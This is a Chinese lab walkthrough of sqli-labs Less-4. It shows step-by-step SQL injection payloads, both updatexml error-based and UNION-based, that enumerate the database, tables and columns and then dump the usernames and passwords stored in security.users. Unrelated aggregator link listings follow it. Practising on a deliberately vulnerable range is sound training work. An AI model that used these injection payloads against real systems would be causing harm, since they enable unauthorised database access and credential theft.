SXE
SXE

sqli靶场通关之less4

sqli

less4

方法一:updatexml报错函数

1. 找闭合字符
id = 1”) //异常 
id = 1”) and 1 =1 -- + //正确 
id = 1”) and 1 =2 -- + //错误
  • 说明可能存在双引号字符型注入
2. 求列数
id=1") order by 3 -- +

sqli靶场通关之less4_第1张图片

id=1") order by 4 -- +

sqli靶场通关之less4_第2张图片

  • 说明有3列
3. 求显示位
id=1") and 1=2 union select 1,2,3 -- +

sqli靶场通关之less4_第3张图片

4. 爆数据库名
id=1") and updatexml(1,concat(0x7e,(select database()),0x7e),1) -- +

sqli靶场通关之less4_第4张图片

5. 爆表名
id=1") and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1) -- +

sqli靶场通关之less4_第5张图片

6. 爆列名
id=1") and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1) -- +

sqli靶场通关之less4_第6张图片

id=1") and updatexml(1,concat(0x7e,(select group_concat(username,0x7e,password)from security.users)),1) -- +

sqli靶场通关之less4_第7张图片

8. 爆用户名为admin4的密码
id=1") and updatexml(1,concat(0x7e,(select group_concat(username,0x7e,password)from security.users where username='admin4')),1) -- +

sqli靶场通关之less4_第8张图片

方法二: union联合注入

1. 找闭合字符
id = 1”) //异常 
id = 1”) and 1 =1 -- + //正确 
id = 1”) and 1 =2 -- + //错误
  • 说明可能存在双引号字符型注入
2. 求列数
id=1") order by 3 -- +

sqli靶场通关之less4_第9张图片

id=1") order by 4 -- +

sqli靶场通关之less4_第10张图片

  • 说明有3列
3. 求显示位
id=1") and 1=2 union select 1,2,3 -- +

sqli靶场通关之less4_第11张图片

4. 爆数据库名
id=1") and 1=2 union select 1,version(),database() -- +

sqli靶场通关之less4_第12张图片

  • 数据库名为:security
  • 查询一下所有数据库名
id=1") and 1=2 union select 1,2,(select group_concat(schema_name) from information_schema.schemata) -- +

sqli靶场通关之less4_第13张图片

  • 发现有security库
5. 爆表名
id=1") and 1=2 union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='security') -- +

sqli靶场通关之less4_第14张图片

  • 发现有4个表,users表应该是想要找的用户表
6. 爆列名
id=1") and 1=2 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security') -- +

sqli靶场通关之less4_第15张图片

7. 爆字段名
id=1") and 1=2 union select 1,(select group_concat(username) from security.users),(select group_concat(password) from security.users) -- +

sqli靶场通关之less4_第16张图片

8. 爆用户名为admin4的密码
id=1") and 1=2 union select 1,2,(select group_concat(username,password) from security.users where username='admin4') -- +

sqli靶场通关之less4_第17张图片

你可能感兴趣的:(靶场,网络安全)

  • Python网络安全脚本 网络安全Ash pythonweb安全开发语言
    点击文末小卡片,免费获取网络安全全套资料,资料在手,涨薪更快前言睡不着,那就起来学习其实base64模块很早之前用过今天做爬虫的时候有个URL需要用它来编码一下所以百度又学了一下遇到最大的问题就是python3和python2区别问题python3的这个不支持直接上字符串纠结了好久。base64编码Base64是网络上最常见的用于传输8Bit字节代码的编码方式之一,大家可以查看RFC2045~RF
  • 202年充电计划——自学手册 网络安全(黑客技术) 网安康sir web安全安全网络pythonlinux
    基于入门网络安全/黑客打造的:黑客&网络安全入门&进阶学习资源包前言什么是网络安全网络安全可以基于攻击和防御视角来分类,我们经常听到的“红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。如何成为一名黑客很多朋友在学习安全方面都会半路转行,因为不知如何去学,在这里,我将这个整份答案分为黑客(网络安全)入门必备、黑客(网络安全)职业指南、黑客(网络安全)学习
  • 202年充电计划——自学手册 网络安全(黑客技术) 网安康sir web安全安全网络pythonlinux
    基于入门网络安全/黑客打造的:黑客&网络安全入门&进阶学习资源包前言什么是网络安全网络安全可以基于攻击和防御视角来分类,我们经常听到的“红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。如何成为一名黑客很多朋友在学习安全方面都会半路转行,因为不知如何去学,在这里,我将这个整份答案分为黑客(网络安全)入门必备、黑客(网络安全)职业指南、黑客(网络安全)学习
  • 202年充电计划——自学手册 网络安全(黑客技术) 网安康sir web安全安全网络pythonlinux
    基于入门网络安全/黑客打造的:黑客&网络安全入门&进阶学习资源包前言什么是网络安全网络安全可以基于攻击和防御视角来分类,我们经常听到的“红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。如何成为一名黑客很多朋友在学习安全方面都会半路转行,因为不知如何去学,在这里,我将这个整份答案分为黑客(网络安全)入门必备、黑客(网络安全)职业指南、黑客(网络安全)学习
  • 网络安全体系框架 热爱前端的小wen web安全安全网络安全安全架构网络安全框架
    网络安全体系框架目录一、引言1.网络安全问题的提出-------------------------------------------------2.网络安全体系框架设计的重要性---------------------------------------二、网络安全体系框架的设计理念1.总体设计理念------------------------------------------------
  • 网络安全常见的三层架构(非常详细)零基础入门到精通,收藏这一篇就够了_网络安全架构 网络安全学习库 程序员计算机互联网web安全架构安全
    给客户做网络安全咨询设计网络安全架构时,我们比较常见的一种思路是三层。防御层面监控层面加固层面图1:画了一个示意简图这种思路从哪里来的呢?是从实际的工作中总结出来的,这三层架构说起来很清晰,客户可以理解,做起来也容易,反正都能套到这三层里去。每层做细后,实际效果也还可以。现在把这三层常见的措施说说。1、防御层面这一层第一步是梳理网络资产,把客户当前的资产暴露面梳理一下。要梳理的信息不是拍脑袋想的,
  • 【网络安全】OSI网络安全体系结构 Hacker_Fuchen web安全网络安全
    1.OSI安全体系结构概述1.1背景与目的OSI安全体系结构是在开放式系统互联(OSI)参考模型的基础上,为了解决网络通信中的安全问题而提出的。随着计算机网络技术的快速发展,数据传输的安全性变得越来越重要。OSI安全体系结构的提出,旨在为网络通信提供一个标准化的安全框架,确保信息在传输过程中的机密性、完整性和可用性。国际标准化组织(ISO)在20世纪80年代提出了OSI参考模型,随后为了应对日益增
  • 深信服与泛微达成战略合作,携手打造安全可控统一身份管控平台与专属移动APP 泛微OA办公系统 泛微深信服令信通统一身份
    近日,网络安全知名厂商——深信服与泛微达成战略合作,双方将充分发挥在各自领域的专业优势与资源积累,从品牌、产品、技术、渠道等多方面展开深度合作。双方发挥深信服网络安全、云计算与泛微协同管理软件的组合服务优势,在统一身份管控平台与移动数字化产品上实现集成合作,共同助力组织打造:系统更安全、身份更可控、访问更灵活的全程数字化运营平台。强强联合·展开全方位合作-共同服务好客户-01.深信服·零信任平台&
  • 数据解密技术的应用与未来发展趋势分析 智能计算研究中心 其他
    内容概要数据解密技术作为信息安全领域的重要组成部分,具有广泛的应用前景。随着现代科技的迅速发展,数据解密的方法和手段也在不断演变。在金融安全领域,数据解密技术帮助机构保护客户信息,防止信息泄露与金融诈骗;而在医疗领域,解密措施保证患者隐私数据的安全存储和传递,促进了电子病历系统的有效使用。同时,在网络安全中,数据解密技术与加密算法相辅相成,共同抵御着日益严峻的网络攻击。提示:了解这些技术的实际应用
  • 网络安全常见面试题--含答案 网络安全-杰克 web安全安全
    本文面试题汇总:防范常见的Web攻击重要协议分布层arp协议的工作原理rip协议是什么?rip的工作原理什么是RARP?工作原理OSPF协议?OSPF的工作原理TCP与UDP区别总结什么是三次握手四次挥手?tcp为什么要三次握手?dns是什么?dns的工作原理一次完整的HTTP请求过程Cookies和session区别GET和POST的区别HTTPS和HTTP的区别session的工作原理?htt
  • 【网络安全】PHP常见漏洞分析 网络安全-杰克 web安全php安全
    0x01sql注入漏洞sql注入漏洞,只要是一个懂编程的基本都听说过的,即便你不太了解网络安全,这个漏洞也被大家广泛的知道了,因为它的危害性和影响的深远性。sql注入可以按照接收的元素分为数字型注入和字符型注入。按照注入的语法,可以分为联合注入,布尔注入,延时注入,报错注入,等等。。。也有很多高阶的玩法,主要看编程的功力0x02xss漏洞xss漏洞刚开始很多网站管理员并不太关注,后来随着xss技术
  • 【网络安全】网络安全防护体系 网络安全-杰克 web安全网络安全
    1.网络安全防护体系概述1.1网络安全的重要性网络安全是保护网络空间不受恶意攻击、数据泄露和其他安全威胁的关键。随着数字化转型的加速,网络安全的重要性日益凸显,它不仅关系到个人隐私和企业机密的保护,还涉及到国家安全和社会稳定。据统计,全球每年因网络安全事件造成的经济损失高达数千亿美元,因此,加强网络安全防护已成为全球性的紧迫任务。1.2网络安全防护体系的定义网络安全防护体系是指由一系列相互关联的网
  • 网络安全 linux学习计划 linux网络安全精要 网络安全-杰克 web安全linux学习
    2.使用命令行文件系统层次标准(FHS)是一个文件和目录在Unix和Linux操作系统上面应该如何存储的定义。/bin重要的二进制可执行程序/boot与系统启动有关的文件/etc系统配置文件/home普通用户家目录/lib重要的系统库/media可移动介质的挂载路径/mnt临时的挂载路径/opt可选择安装的软件包/proc与系统内核及进程有关的信息(虚拟的文件系统)/rootroot用户家目录/s
  • 2025年AI网络安全攻防战:挑战深度解析与全链路防御体系构建指南 emmm形成中 网络安全人工智能web安全安全
    2025年AI网络安全攻防战:挑战深度解析与全链路防御体系构建指南引言:AI技术是一把双刃剑随着ChatGPT、Sora等生成式AI技术的爆发式应用,2025年被称为“AI应用元年”。然而,AI在赋能网络安全防御的同时,也为攻击者提供了新型武器。根据瑞星《2024年中国网络安全报告》,AI驱动的钓鱼邮件攻击成功率较传统手段提升47%,而Darktrace预测2025年企业内部“影子AI”工具使用量
  • 运维案例之记一次Kubernetes集群证书过期或延期操作处理实践指南 全栈工程师修炼指南 云原生落地实用指南kubernetes运维docker容器云原生
    欢迎关注「WeiyiGeek」公众号点击下方卡片即可关注我哟!设为「星标⭐」每天带你基础入门到进阶实践再到放弃学习!涉及网络安全运维、应用开发、物联网IOT、学习路径、个人感悟等知识“花开堪折直须折,莫待无花空折枝。”作者主页:[https://www.weiyigeek.top]作者博客:[https://blog.weiyigeek.top]作者答疑学习交流群:
  • python实现对称加密
    对称加密是一种加密技术,其中加密和解密使用相同的密钥。对于初学者来说,理解和实现对称加密是学习网络安全和数据保护的重要一步。本文将通过一个简单的流程来教你如何在Python中实现对称加密。1.实现流程下面是实现对称加密的基本流程:步骤描述1.导入库导入必要的加密库,例如cryptography2.生成密钥生成一个密钥用于加密和解密3.加密数据使用生成的密钥对数据进行加密4.解密数据使用相同的密钥对
  • 网络安全-系统层攻击流程及防御措施 星河776(重名区分) 网络安全web安全安全
    系统层攻击流程涉及多个阶段,攻击者通过逐步渗透以获取控制权或窃取数据。以下是详细的流程及防御措施:1.侦察(Reconnaissance)信息收集:主动扫描:使用工具如Nmap、Masscan扫描目标IP、开放端口、服务版本。被动侦察:通过公开资源(Shodan、Censys)或DNS记录获取系统信息。漏洞匹配:比对CVE、Exploit-DB等数据库,寻找已知漏洞(如ApacheLog4j漏洞)
  • 好用的5款漏洞扫描工具推荐! 网安-轩逸 web安全安全网络安全linux
    漏洞扫描是指基于漏洞数据库,通过扫描等手段对指定的远程或本地计算机系统的安全脆弱性进行检测,发现可利用漏洞的一种安全检测的行为,也是网络安全领域中非常重要的环节。本文为大家推荐5款常用的开源漏洞扫描工具,一起来看看吧。1、NmapNmap是一款非常流行的自动化安全测试工具。它可以在各种主流操作系统上运行,并快速扫描大型网络。它通常会检测以下信息:网络上有哪些主机可用,主机在运行什么服务,主机在运行
  • 202年寒假充电计划——自学手册 网络安全(黑客技术) 网安康sir web安全安全网络pythonlinux
    前言什么是网络安全网络安全可以基于攻击和防御视角来分类,我们经常听到的“红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。如何成为一名黑客很多朋友在学习安全方面都会半路转行,因为不知如何去学,在这里,我将这个整份答案分为黑客(网络安全)入门必备、黑客(网络安全)职业指南、黑客(网络安全)学习导航三大章节,涉及价值观、方法论、执行力、行业分类、职位解读、法
  • 2025年入职/转行网络安全,该如何规划?_网络安全职业规划 徐老师教网络安全 web安全安全phphttps网络协议
    前言前段时间,知名机构麦可思研究院发布了《2022年中国本科生就业报告》,其中详细列出近五年的本科绿牌专业,其中,信息安全位列第一。网络安全前景对于网络安全的发展与就业前景,想必无需我多言,作为当下应届生收入较高的专业之一,网络安全同样也在转行领域中占据热门位置,主要具备以下几点转行优势:行业人才缺口大,至2027年我国网安人才缺口将达327万知识体系友好,计算机及英语水平相对薄弱的同学也可学习上
  • 为什么说网络安全行业是IT行业最后的红利? 网络安全技术分享地 web安全安全网络安全phplinux
    一、为什么选择网络安全?这几年随着我国《国家网络空间安全战略》《网络安全法》《网络安全等级保护2.0》等一系列政策/法规/标准的持续落地,网络安全行业地位、薪资随之水涨船高。未来3-5年,是安全行业的黄金发展期,提前踏入行业,能享受行业发展红利。二、为什么说网络安全行业是IT行业最后的红利?根据腾讯安全发布的《互联网安全报告》,目前中国网络安全人才供应严重匮乏,每年高校安全专业培养人才仅有3万余人
  • 网络安全产品 星鬼123 网络安全相关web安全安全
    安全产品与特点概览文章目录安全产品与特点概览**1.边界防护类****2.网络优化与管控类****3.终端与数据安全类****4.高级威胁防御类****5.云与新兴安全类****6.安全运营闭环**特点1.边界防护类防火墙设备核心功能:网络区域逻辑隔离、VPN加密通信、访问控制策略管理。关键技术:五元组过滤(源/目IP、端口、协议);下一代防火墙(NGFW)支持应用层识别;VPN虚拟化隧道(IPS
  • 不要再走弯路了2025最全的黑客入门学习路线在这 渗透代老师 学习网络安全安全网络web安全
    基于入门网络安全/黑客打造的:黑客&网络安全入门&进阶学习资源包在大多数的思维里总觉得[学习]得先收集资料、学习编程、学习计算机基础,这样不是不可以,但是这样学效率太低了!你要知道网络安全是一门技术,任何技术的学习一定是以实践为主的。也就是说很多的理论知识其实是可以在实践中去验证拓展的,这样学习比起你啃原理、啃书本要好理解很多。所以想要学习网络安全选对正确的学习方法很重要,这可以帮你少走很多弯路。
  • 网络安全复习资料 网络安全-杰克 web安全网络安全
    网络安全复习资料1.计算机网络安全是指保持网络中的硬件、软件系统正常运行,使他们不因自然和人为的因素而受到破坏、更改和泄露。2.网络安全:物理安全,软件安全,信息安全,运行安全。3.安全防范措施:通过备份技术提高数据信息的完整性;病毒检查;及时安装补丁程序;提高物理安全;设置Internet防火墙;审查日志;数据加密。4.保护计算机网络设备免受环境事故的影响属于安全信息的物理安全。5.有些计算机系
  • 《数字围城与看不见的手:网络安全的经济哲学简史》 安全
    (楔子:从青铜铸币到数据流)公元前7世纪,吕底亚人将琥珀金铸成硬币,货币流动催生了人类的安全难题——如何防止赝品渗透经济血脉。2023年,某跨国电商平台因API接口漏洞,每秒有317个虚拟账户在暗网交易数字资产。这组跨越时空的数据揭示永恒定律:财富形态决定安全范式,防护技术永远比攻击手段晚进化0.618个黄金分割周期。一、数据资本论:生产要素的惊险跳跃当亚当·斯密凝视别针工厂时,他看到的劳动分工正
  • 从零开始学习黑客技术,看这一篇就够了 网络安全-旭师兄 学习web安全安全python密码学
    基于入门网络安全/黑客打造的:黑客&网络安全入门&进阶学习资源包黑客,对于很多人来说,是一个神秘的代名词,加之影视作品夸张的艺术表现,使得黑客这个本来只专注于技术的群体,散发出亦正亦邪的神秘色彩。黑客源自英文hacker一词,最初曾指热心于计算机技术、水平高超的电脑高手,尤其是程序设计人员,逐渐区分为白帽、灰帽、黑帽等。其中,白帽黑客被称为道德黑客。他们不会非法入侵用户网络,而是通过一系列测试检查
  • 202年寒假充电计划——自学手册 网络安全(黑客技术) 网安康sir web安全安全网络php开发语言
    前言什么是网络安全网络安全可以基于攻击和防御视角来分类,我们经常听到的“红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。如何成为一名黑客很多朋友在学习安全方面都会半路转行,因为不知如何去学,在这里,我将这个整份答案分为黑客(网络安全)入门必备、黑客(网络安全)职业指南、黑客(网络安全)学习导航三大章节,涉及价值观、方法论、执行力、行业分类、职位解读、法
  • linux-网络安全&防火墙 ...狂风... Linuxweb安全网络安全
    网络安全的特征根据角度不同,网络安全的具体含义也不同,但总体来说,网络安全主要具备以下四个方面的特征。(1)完整性:指信息在存储、传输过程中不会丢失,并且不会被修改、不会被破坏的特性,即保持信息“原貌”,这是网络安全最基本的特征。(2)机密性:指非授权对象无法获取信息而加以利用。(3)可用性:指被授权对象在需要时可以获取信息并按需求使用。(4)可控性:指对信息的具体内容及传播能够实现有效的控制。网
  • Linux网络安全 网络安全指导员 程序员网络安全黑客linuxweb安全运维
    Linux网络安全一直是IT行业中备受关注的话题,而红帽作为Linux操作系统的知名发行版,在网络安全领域也扮演着重要的角色。红帽公司一直致力于为用户提供安全可靠的Linux解决方案,以帮助用户建立强大的网络安全防护体系。首先红帽操作系统本身具有较高的安全性。作为一款开源操作系统,Linux具有代码透明、强大的权限管理和丰富的安全功能等特点,这使得Linux相对于其他闭源操作系统更加安全可靠。而红
  • 《网络安全自学教程》- TCP/IP协议栈的安全问题和解决方案 士别三日wyx 《网络安全自学教程》网络协议安全tcp/ipweb安全网络安全人工智能ai
    「作者简介」:冬奥会网络安全中国代表队,CSDNTop100,就职奇安信多年。《网络安全自学教程》TCP/IP协议簇是以TCP协议和IP协议为核心、由多种协议组成的「协议栈」,是一组协议的集合。因为OSI是理想化的七层模型,所以TCP/IP协议簇从「实用性」的角度出发,将OSI七层参考模型简化为四层模型。从上往下依次是应用层、传输层、网络互联层、网络接口层。TCP/IP协议栈起初是为了网络互联互通
  • ios内付费 374016526 ios内付费
    近年来写了很多IOS的程序,内付费也用到不少,使用IOS的内付费实现起来比较麻烦,这里我写了一个简单的内付费包,希望对大家有帮助。   具体使用如下: 这里的sender其实就是调用者,这里主要是为了回调使用。 [KuroStoreApi kuroStoreProductId:@"产品ID" storeSender:self storeFinishCallBa
  • 20 款优秀的 Linux 终端仿真器 brotherlamp linuxlinux视频linux资料linux自学linux教程
      终端仿真器是一款用其它显示架构重现可视终端的计算机程序。换句话说就是终端仿真器能使哑终端看似像一台连接上了服务器的客户机。终端仿真器允许最终用户用文本用户界面和命令行来访问控制台和应用程序。(LCTT 译注:终端仿真器原意指对大型机-哑终端方式的模拟,不过在当今的 Linux 环境中,常指通过远程或本地方式连接的伪终端,俗称“终端”。) 你能从开源世界中找到大量的终端仿真器,它们
  • Solr Deep Paging(solr 深分页) eksliang solr深分页solr分页性能问题
    转载请出自出处:http://eksliang.iteye.com/blog/2148370 作者:eksliang(ickes) blg:http://eksliang.iteye.com/ 概述 长期以来,我们一直有一个深分页问题。如果直接跳到很靠后的页数,查询速度会比较慢。这是因为Solr的需要为查询从开始遍历所有数据。直到Solr的4.7这个问题一直没有一个很好的解决方案。直到solr
  • 数据库面试题 18289753290 面试题 数据库
    1.union ,union all 网络搜索出的最佳答案: union和union all的区别是,union会自动压缩多个结果集合中的重复结果,而union all则将所有的结果全部显示出来,不管是不是重复。 Union:对两个结果集进行并集操作,不包括重复行,同时进行默认规则的排序; Union All:对两个结果集进行并集操作,包括重复行,不进行排序; 2.索引有哪些分类?作用是
  • Android TV屏幕适配 酷的飞上天空 android
    先说下现在市面上TV分辨率的大概情况 两种分辨率为主 1.720标清,分辨率为1280x720. 屏幕尺寸以32寸为主,部分电视为42寸 2.1080p全高清,分辨率为1920x1080 屏幕尺寸以42寸为主,此分辨率电视屏幕从32寸到50寸都有   适配遇到问题,已1080p尺寸为例: 分辨率固定不变,屏幕尺寸变化较大。 如:效果图尺寸为1920x1080,如果使用d
  • Timer定时器与ActionListener联合应用 永夜-极光 java
    功能:在控制台每秒输出一次   代码: package Main; import javax.swing.Timer; import java.awt.event.*; public class T { private static int count = 0; public static void main(String[] args){
  • Ubuntu14.04系统Tab键不能自动补全问题解决 随便小屋 Ubuntu 14.04
    Unbuntu 14.4安装之后就在终端中使用Tab键不能自动补全,解决办法如下:   1、利用vi编辑器打开/etc/bash.bashrc文件(需要root权限) sudo vi /etc/bash.bashrc  接下来会提示输入密码 2、找到文件中的下列代码 #enable bash completion in interactive shells #if
  • 学会人际关系三招 轻松走职场 aijuans 职场
    要想成功,仅有专业能力是不够的,处理好与老板、同事及下属的人际关系也是门大学问。如何才能在职场如鱼得水、游刃有余呢?在此,教您简单实用的三个窍门。   第一,多汇报 最近,管理学又提出了一个新名词“追随力”。它告诉我们,做下属最关键的就是要多请示汇报,让上司随时了解你的工作进度,有了新想法也要及时建议。不知不觉,你就有了“追随力”,上司会越来越了解和信任你。   第二,勤沟通 团队的力
  • 《O2O:移动互联网时代的商业革命》读书笔记 aoyouzi 读书笔记
    移动互联网的未来:碎片化内容+碎片化渠道=各式精准、互动的新型社会化营销。   O2O:Online to OffLine 线上线下活动 O2O就是在移动互联网时代,生活消费领域通过线上和线下互动的一种新型商业模式。   手机二维码本质:O2O商务行为从线下现实世界到线上虚拟世界的入口。   线上虚拟世界创造的本意是打破信息鸿沟,让不同地域、不同需求的人
  • js实现图片随鼠标滚动的效果 百合不是茶 JavaScript滚动属性的获取图片滚动属性获取页面加载
    1,获取样式属性值 top 与顶部的距离 left 与左边的距离 right 与右边的距离 bottom 与下边的距离 zIndex 层叠层次     例子:获取左边的宽度,当css写在body标签中时 <div id="adver" style="position:absolute;top:50px;left:1000p
  • ajax同步异步参数async bijian1013 jqueryAjaxasync
            开发项目开发过程中,需要将ajax的返回值赋到全局变量中,然后在该页面其他地方引用,因为ajax异步的原因一直无法成功,需将async:false,使其变成同步的。         格式: $.ajax({ type: 'POST', ur
  • Webx3框架(1) Bill_chen eclipsespringmaven框架ibatis
    Webx是淘宝开发的一套Web开发框架,Webx3是其第三个升级版本;采用Eclipse的开发环境,现在支持java开发; 采用turbine原型的MVC框架,扩展了Spring容器,利用Maven进行项目的构建管理,灵活的ibatis持久层支持,总的来说,还是一套很不错的Web框架。 Webx3遵循turbine风格,velocity的模板被分为layout/screen/control三部
  • 【MongoDB学习笔记五】MongoDB概述 bit1129 mongodb
    MongoDB是面向文档的NoSQL数据库,尽量业界还对MongoDB存在一些质疑的声音,比如性能尤其是查询性能、数据一致性的支持没有想象的那么好,但是MongoDB用户群确实已经够多。MongoDB的亮点不在于它的性能,而是它处理非结构化数据的能力以及内置对分布式的支持(复制、分片达到的高可用、高可伸缩),同时它提供的近似于SQL的查询能力,也是在做NoSQL技术选型时,考虑的一个重要因素。Mo
  • spring/hibernate/struts2常见异常总结 白糖_ Hibernate
    Spring ①ClassNotFoundException: org.aspectj.weaver.reflect.ReflectionWorld$ReflectionWorldException 缺少aspectjweaver.jar,该jar包常用于spring aop中   ②java.lang.ClassNotFoundException: org.sprin
  • jquery easyui表单重置(reset)扩展思路 bozch formjquery easyuireset
    在jquery easyui表单中 尚未提供表单重置的功能,这就需要自己对其进行扩展。 扩展的时候要考虑的控件有: combo,combobox,combogrid,combotree,datebox,datetimebox 需要对其添加reset方法,reset方法就是把初始化的值赋值给当前的组件,这就需要在组件的初始化时将值保存下来。 在所有的reset方法添加完毕之后,就需要对fo
  • 编程之美-烙饼排序 bylijinnan 编程之美
    package beautyOfCoding; import java.util.Arrays; /* *《编程之美》的思路是:搜索+剪枝。有点像是写下棋程序:当前情况下,把所有可能的下一步都做一遍;在这每一遍操作里面,计算出如果按这一步走的话,能不能赢(得出最优结果)。 *《编程之美》上代码有很多错误,且每个变量的含义令人费解。因此我按我的理解写了以下代码: */
  • Struts1.X 源码分析之ActionForm赋值原理 chenbowen00 struts
    struts1在处理请求参数之前,首先会根据配置文件action节点的name属性创建对应的ActionForm。如果配置了name属性,却找不到对应的ActionForm类也不会报错,只是不会处理本次请求的请求参数。 如果找到了对应的ActionForm类,则先判断是否已经存在ActionForm的实例,如果不存在则创建实例,并将其存放在对应的作用域中。作用域由配置文件action节点的s
  • [空天防御与经济]在获得充足的外部资源之前,太空投资需有限度 comsci 资源
          这里有一个常识性的问题:       地球的资源,人类的资金是有限的,而太空是无限的.....       就算全人类联合起来,要在太空中修建大型空间站,也不一定能够成功,因为资源和资金,技术有客观的限制.... &
  • ORACLE临时表—ON COMMIT PRESERVE ROWS daizj oracle临时表
    ORACLE临时表 转 临时表:像普通表一样,有结构,但是对数据的管理上不一样,临时表存储事务或会话的中间结果集,临时表中保存的数据只对当前 会话可见,所有会话都看不到其他会话的数据,即使其他会话提交了,也看不到。临时表不存在并发行为,因为他们对于当前会话都是独立的。 创建临时表时,ORACLE只创建了表的结构(在数据字典中定义),并没有初始化内存空间,当某一会话使用临时表时,ORALCE会
  • 基于Nginx XSendfile+SpringMVC进行文件下载 denger 应用服务器Webnginx网络应用lighttpd
        在平常我们实现文件下载通常是通过普通 read-write方式,如下代码所示。 @RequestMapping("/courseware/{id}") public void download(@PathVariable("id") String courseID, HttpServletResp
  • scanf接受char类型的字符 dcj3sjt126com c
    /* 2013年3月11日22:35:54 目的:学习char只接受一个字符 */ # include <stdio.h> int main(void) { int i; char ch; scanf("%d", &i); printf("i = %d\n", i); scanf("%
  • 学编程的价值 dcj3sjt126com 编程
    发一个人会编程, 想想以后可以教儿女, 是多么美好的事啊, 不管儿女将来从事什么样的职业, 教一教, 对他思维的开拓大有帮助   像这位朋友学习:   http://blog.sina.com.cn/s/articlelist_2584320772_0_1.html   VirtualGS教程 (By @林泰前): 几十年的老程序员,资深的
  • 二维数组(矩阵)对角线输出 飞天奔月 二维数组
    今天在BBS里面看到这样的面试题目,   1,二维数组(N*N),沿对角线方向,从右上角打印到左下角如N=4: 4*4二维数组  { 1 2 3 4 } { 5 6 7 8 } { 9 10 11 12 } {13 14 15 16 } 打印顺序  4 3 8 2 7 12 1 6 11 16 5 10 15 9 14 13 要
  • Ehcache(08)——可阻塞的Cache——BlockingCache 234390216 并发ehcacheBlockingCache阻塞
    可阻塞的Cache—BlockingCache          在上一节我们提到了显示使用Ehcache锁的问题,其实我们还可以隐式的来使用Ehcache的锁,那就是通过BlockingCache。BlockingCache是Ehcache的一个封装类,可以让我们对Ehcache进行并发操作。其内部的锁机制是使用的net.
  • mysqldiff对数据库间进行差异比较 jackyrong mysqld
      mysqldiff该工具是官方mysql-utilities工具集的一个脚本,可以用来对比不同数据库之间的表结构,或者同个数据库间的表结构    如果在windows下,直接下载mysql-utilities安装就可以了,然后运行后,会跑到命令行下: 1) 基本用法    mysqldiff --server1=admin:12345
  • spring data jpa 方法中可用的关键字 lawrence.li javaspring
    spring data jpa 支持以方法名进行查询/删除/统计。 查询的关键字为find 删除的关键字为delete/remove (>=1.7.x) 统计的关键字为count (>=1.7.x)   修改需要使用@Modifying注解 @Modifying @Query("update User u set u.firstna
  • Spring的ModelAndView类 nicegege spring
    项目中controller的方法跳转的到ModelAndView类,一直很好奇spring怎么实现的? /* * Copyright 2002-2010 the original author or authors. * * Licensed under the Apache License, Version 2.0 (the "License"); * yo
  • 搭建 CentOS 6 服务器(13) - rsync、Amanda rensanning centos
    (一)rsync Server端 # yum install rsync # vi /etc/xinetd.d/rsync service rsync { disable = no flags = IPv6 socket_type = stream wait
  • Learn Nodejs 02 toknowme nodejs
    (1)npm是什么 npm is the package manager for node 官方网站:https://www.npmjs.com/ npm上有很多优秀的nodejs包,来解决常见的一些问题,比如用node-mysql,就可以方便通过nodejs链接到mysql,进行数据库的操作 在开发过程往往会需要用到其他的包,使用npm就可以下载这些包来供程序调用 &nb
  • Spring MVC 拦截器 xp9802 spring mvc
    Controller层的拦截器继承于HandlerInterceptorAdapter HandlerInterceptorAdapter.java  1  public   abstract   class  HandlerInterceptorAdapter  implements  HandlerIntercep
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他